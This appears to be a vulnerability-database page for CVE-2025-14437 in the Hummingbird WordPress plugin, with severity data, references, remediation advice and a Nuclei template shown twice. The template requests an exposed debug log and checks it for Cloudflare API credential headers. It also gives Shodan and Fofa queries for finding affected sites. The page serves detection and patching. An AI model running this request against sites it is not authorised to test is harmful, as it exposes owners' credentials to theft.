WordPress Hummingbird <= 3.18.0 - Sensitive Information Exposure via Log File

CVE-2025-14437

Verified

Description

Hummingbird Performance WordPress plugin <= 3.18.0 contains a sensitive information exposure caused by improper handling in the 'request' function, letting unauthenticated attackers extract sensitive data including Cloudflare API credentials, exploit requires no authentication.

Severity

High

CVSS Score

7.5

Exploit Probability

32%

Affected Product

hummingbird-performance

Published Date

March 26, 2026

Template Author

pussycat0x

CVE-2025-14437.yaml

id: CVE-2025-14437

info:
  name: WordPress Hummingbird <= 3.18.0 - Sensitive Information Exposure via Log File
  author: pussycat0x
  severity: high
  description: |
    Hummingbird Performance WordPress plugin <= 3.18.0 contains a sensitive information exposure caused by improper handling in the 'request' function, letting unauthenticated attackers extract sensitive data including Cloudflare API credentials, exploit requires no authentication.
  impact: |
    Unauthenticated attackers can extract sensitive credentials, leading to potential account compromise and further attacks.
  remediation: |
    Update to the latest version beyond 3.18.0.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/hummingbird-performance/hummingbird-3180-unauthenticated-sensitive-information-exposure-via-log-files
    - https://wpscan.com/vulnerability/cve-2025-14437
    - https://plugins.trac.wordpress.org/changeset/3421187/hummingbird-performance
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2025-14437
    epss-score: 0.31739
    epss-percentile: 0.96866
    cwe-id: CWE-532
  metadata:
    verified: true
    max-request: 1
    vendor: wpmudev
    product: hummingbird-performance
    framework: wordpress
    shodan-query: http.html:"/wp-content/plugins/hummingbird-performance"
    fofa-query: body="/wp-content/plugins/hummingbird-performance"
  tags: cve,cve2025,wordpress,wp-plugin,hummingbird,exposure,cloudflare,wpmudev,vkev

http:
  - raw:
      - |
        GET /wp-content/wphb-logs/api-debug.log HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "WPHB", "X-Auth-Key", "X-Auth-Email", "Authorization")'
        condition: and
# digest: 4b0a00483046022100abc3c0b5a7f9399c7af348fc9d8096673ab5a3890fd1feacf9176991791612c7022100a99405138d5977932ff7c7392ea19877e007c13611468e19f94ed6600285cd77:922c64590222798bb761d5b6d8e72950

7.5Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVE ID:

cve-2025-14437

CWE ID:

cwe-532

References

https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/hummingbird-performance/hummingbird-3180-unauthenticated-sensitive-information-exposure-via-log-files https://wpscan.com/vulnerability/cve-2025-14437 https://plugins.trac.wordpress.org/changeset/3421187/hummingbird-performance

Remediation Steps

Update to the latest version beyond 3.18.0.

id: CVE-2025-14437

info:
  name: WordPress Hummingbird <= 3.18.0 - Sensitive Information Exposure via Log File
  author: pussycat0x
  severity: high
  description: |
    Hummingbird Performance WordPress plugin <= 3.18.0 contains a sensitive information exposure caused by improper handling in the 'request' function, letting unauthenticated attackers extract sensitive data including Cloudflare API credentials, exploit requires no authentication.
  impact: |
    Unauthenticated attackers can extract sensitive credentials, leading to potential account compromise and further attacks.
  remediation: |
    Update to the latest version beyond 3.18.0.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/hummingbird-performance/hummingbird-3180-unauthenticated-sensitive-information-exposure-via-log-files
    - https://wpscan.com/vulnerability/cve-2025-14437
    - https://plugins.trac.wordpress.org/changeset/3421187/hummingbird-performance
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2025-14437
    epss-score: 0.31739
    epss-percentile: 0.96866
    cwe-id: CWE-532
  metadata:
    verified: true
    max-request: 1
    vendor: wpmudev
    product: hummingbird-performance
    framework: wordpress
    shodan-query: http.html:"/wp-content/plugins/hummingbird-performance"
    fofa-query: body="/wp-content/plugins/hummingbird-performance"
  tags: cve,cve2025,wordpress,wp-plugin,hummingbird,exposure,cloudflare,wpmudev,vkev

http:
  - raw:
      - |
        GET /wp-content/wphb-logs/api-debug.log HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "WPHB", "X-Auth-Key", "X-Auth-Email", "Authorization")'
        condition: and
# digest: 4b0a00483046022100abc3c0b5a7f9399c7af348fc9d8096673ab5a3890fd1feacf9176991791612c7022100a99405138d5977932ff7c7392ea19877e007c13611468e19f94ed6600285cd77:922c64590222798bb761d5b6d8e72950

WordPress Hummingbird <= 3.18.0 - Sensitive Information Exposure via Log File

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

WordPress Hummingbird <= 3.18.0 - Sensitive Information Exposure via Log File

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps